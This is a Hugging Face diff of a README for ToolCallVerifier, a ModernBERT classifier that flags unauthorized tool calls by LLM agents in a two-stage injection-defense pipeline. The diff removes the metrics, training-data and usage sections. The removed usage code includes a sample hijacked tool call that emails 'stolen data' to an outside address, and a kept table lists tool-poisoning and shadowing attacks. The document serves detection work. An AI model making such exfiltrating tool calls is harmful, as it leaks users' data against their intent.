Update README.md
Browse files
README.md
CHANGED
|
@@ -20,7 +20,7 @@ datasets:
|
|
| 20 |
base_model: answerdotai/ModernBERT-base
|
| 21 |
pipeline_tag: token-classification
|
| 22 |
model-index:
|
| 23 |
-
- name:
|
| 24 |
results:
|
| 25 |
- task:
|
| 26 |
type: token-classification
|
|
@@ -46,7 +46,6 @@ model-index:
|
|
| 46 |
|
| 47 |
[](https://opensource.org/licenses/Apache-2.0)
|
| 48 |
[](https://huggingface.co/answerdotai/ModernBERT-base)
|
| 49 |
-
[](https://huggingface.co/rootfs)
|
| 50 |
|
| 51 |
**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
|
| 52 |
|
|
@@ -65,54 +64,6 @@ ToolCallVerifier is a **ModernBERT-based token classifier** that detects unautho
|
|
| 65 |
|
| 66 |
---
|
| 67 |
|
| 68 |
-
## π Performance
|
| 69 |
-
|
| 70 |
-
| Metric | Value |
|
| 71 |
-
|--------|-------|
|
| 72 |
-
| **UNAUTHORIZED F1** | **93.50%** |
|
| 73 |
-
| UNAUTHORIZED Precision | 95.01% |
|
| 74 |
-
| UNAUTHORIZED Recall | 92.05% |
|
| 75 |
-
| Overall Accuracy | 92.88% |
|
| 76 |
-
|
| 77 |
-
### Confusion Matrix (Token-Level)
|
| 78 |
-
|
| 79 |
-
```
|
| 80 |
-
Predicted
|
| 81 |
-
AUTH UNAUTH
|
| 82 |
-
Actual AUTH 130,708 8,483
|
| 83 |
-
UNAUTH 13,924 161,031
|
| 84 |
-
```
|
| 85 |
-
|
| 86 |
-
---
|
| 87 |
-
|
| 88 |
-
## ποΈ Training Data
|
| 89 |
-
|
| 90 |
-
Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
|
| 91 |
-
|
| 92 |
-
### HuggingFace Datasets
|
| 93 |
-
|
| 94 |
-
| Dataset | Description | Samples |
|
| 95 |
-
|---------|-------------|---------|
|
| 96 |
-
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
|
| 97 |
-
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
|
| 98 |
-
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
|
| 99 |
-
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
|
| 100 |
-
|
| 101 |
-
### Synthetic Attack Generators
|
| 102 |
-
|
| 103 |
-
| Generator | Description |
|
| 104 |
-
|-----------|-------------|
|
| 105 |
-
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
|
| 106 |
-
| Filesystem | File/directory operation attacks |
|
| 107 |
-
| Network | Network/API exfiltration attacks |
|
| 108 |
-
| Email | Email tool hijacking |
|
| 109 |
-
| Financial | Transaction manipulation |
|
| 110 |
-
| Code Execution | Code injection attacks |
|
| 111 |
-
| Authentication | Access control bypass |
|
| 112 |
-
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
|
| 113 |
-
|
| 114 |
-
---
|
| 115 |
-
|
| 116 |
## π¨ Attack Categories Covered
|
| 117 |
|
| 118 |
| Category | Source | Description |
|
|
@@ -127,60 +78,6 @@ Trained on **~30,000 samples** combining real-world attacks and synthetic patter
|
|
| 127 |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
|
| 128 |
| MCP Shadowing | Synthetic | Fake authorization context |
|
| 129 |
|
| 130 |
-
---
|
| 131 |
-
|
| 132 |
-
## π» Usage
|
| 133 |
-
|
| 134 |
-
```python
|
| 135 |
-
from transformers import AutoTokenizer, AutoModelForTokenClassification
|
| 136 |
-
import torch
|
| 137 |
-
|
| 138 |
-
model_name = "rootfs/tool-call-verifier"
|
| 139 |
-
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 140 |
-
model = AutoModelForTokenClassification.from_pretrained(model_name)
|
| 141 |
-
|
| 142 |
-
# Example: Verify a tool call
|
| 143 |
-
user_intent = "Summarize my emails"
|
| 144 |
-
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
|
| 145 |
-
|
| 146 |
-
# Combine for classification
|
| 147 |
-
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
|
| 148 |
-
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
|
| 149 |
-
|
| 150 |
-
with torch.no_grad():
|
| 151 |
-
outputs = model(**inputs)
|
| 152 |
-
predictions = torch.argmax(outputs.logits, dim=-1)
|
| 153 |
-
|
| 154 |
-
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
|
| 155 |
-
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
|
| 156 |
-
labels = [id2label[p.item()] for p in predictions[0]]
|
| 157 |
-
|
| 158 |
-
# Check for unauthorized tokens
|
| 159 |
-
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
|
| 160 |
-
if unauthorized_tokens:
|
| 161 |
-
print("β οΈ BLOCKED: Unauthorized tool call detected!")
|
| 162 |
-
print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
|
| 163 |
-
else:
|
| 164 |
-
print("β
Tool call authorized")
|
| 165 |
-
```
|
| 166 |
-
|
| 167 |
-
---
|
| 168 |
-
|
| 169 |
-
## βοΈ Training Configuration
|
| 170 |
-
|
| 171 |
-
| Parameter | Value |
|
| 172 |
-
|-----------|-------|
|
| 173 |
-
| Base Model | `answerdotai/ModernBERT-base` |
|
| 174 |
-
| Max Length | 512 tokens |
|
| 175 |
-
| Batch Size | 32 |
|
| 176 |
-
| Epochs | 5 |
|
| 177 |
-
| Learning Rate | 3e-5 |
|
| 178 |
-
| Loss | CrossEntropyLoss (class-weighted) |
|
| 179 |
-
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
|
| 180 |
-
| Attention | SDPA (Flash Attention) |
|
| 181 |
-
| Hardware | AMD Instinct MI300X (ROCm) |
|
| 182 |
-
|
| 183 |
-
---
|
| 184 |
|
| 185 |
## π Integration with FunctionCallSentinel
|
| 186 |
|
|
@@ -188,7 +85,7 @@ This model is **Stage 2** of a two-stage defense pipeline:
|
|
| 188 |
|
| 189 |
```
|
| 190 |
βββββββββββββββββββ ββββββββββββββββββββββββ βββββββββββββββββββ
|
| 191 |
-
β User Prompt ββββββΆβ
|
| 192 |
β β β (Stage 1) β β β
|
| 193 |
βββββββββββββββββββ ββββββββββββββββββββββββ ββββββββββ¬βββββββββ
|
| 194 |
β
|
|
@@ -220,23 +117,8 @@ This model is **Stage 2** of a two-stage defense pipeline:
|
|
| 220 |
- Non-tool-calling scenarios
|
| 221 |
- Languages other than English
|
| 222 |
|
| 223 |
-
---
|
| 224 |
-
|
| 225 |
-
## β οΈ Limitations
|
| 226 |
-
|
| 227 |
-
1. **Tool schema dependent** β Best performance when tool schema is included in input
|
| 228 |
-
2. **English only** β Not tested on other languages
|
| 229 |
-
3. **Binary classification** β No "suspicious" intermediate category (by design, for decisiveness)
|
| 230 |
-
|
| 231 |
-
---
|
| 232 |
|
| 233 |
## π License
|
| 234 |
|
| 235 |
Apache 2.0
|
| 236 |
|
| 237 |
-
---
|
| 238 |
-
|
| 239 |
-
## π Links
|
| 240 |
-
|
| 241 |
-
- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)
|
| 242 |
-
|
|
|
|
| 20 |
base_model: answerdotai/ModernBERT-base
|
| 21 |
pipeline_tag: token-classification
|
| 22 |
model-index:
|
| 23 |
+
- name: toolcall-verifier
|
| 24 |
results:
|
| 25 |
- task:
|
| 26 |
type: token-classification
|
|
|
|
| 46 |
|
| 47 |
[](https://opensource.org/licenses/Apache-2.0)
|
| 48 |
[](https://huggingface.co/answerdotai/ModernBERT-base)
|
|
|
|
| 49 |
|
| 50 |
**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
|
| 51 |
|
|
|
|
| 64 |
|
| 65 |
---
|
| 66 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 67 |
## π¨ Attack Categories Covered
|
| 68 |
|
| 69 |
| Category | Source | Description |
|
|
|
|
| 78 |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
|
| 79 |
| MCP Shadowing | Synthetic | Fake authorization context |
|
| 80 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 81 |
|
| 82 |
## π Integration with FunctionCallSentinel
|
| 83 |
|
|
|
|
| 85 |
|
| 86 |
```
|
| 87 |
βββββββββββββββββββ ββββββββββββββββββββββββ βββββββββββββββββββ
|
| 88 |
+
β User Prompt ββββββΆβ ToolCallSentinel ββββββΆβ LLM + Tools β
|
| 89 |
β β β (Stage 1) β β β
|
| 90 |
βββββββββββββββββββ ββββββββββββββββββββββββ ββββββββββ¬βββββββββ
|
| 91 |
β
|
|
|
|
| 117 |
- Non-tool-calling scenarios
|
| 118 |
- Languages other than English
|
| 119 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 120 |
|
| 121 |
## π License
|
| 122 |
|
| 123 |
Apache 2.0
|
| 124 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|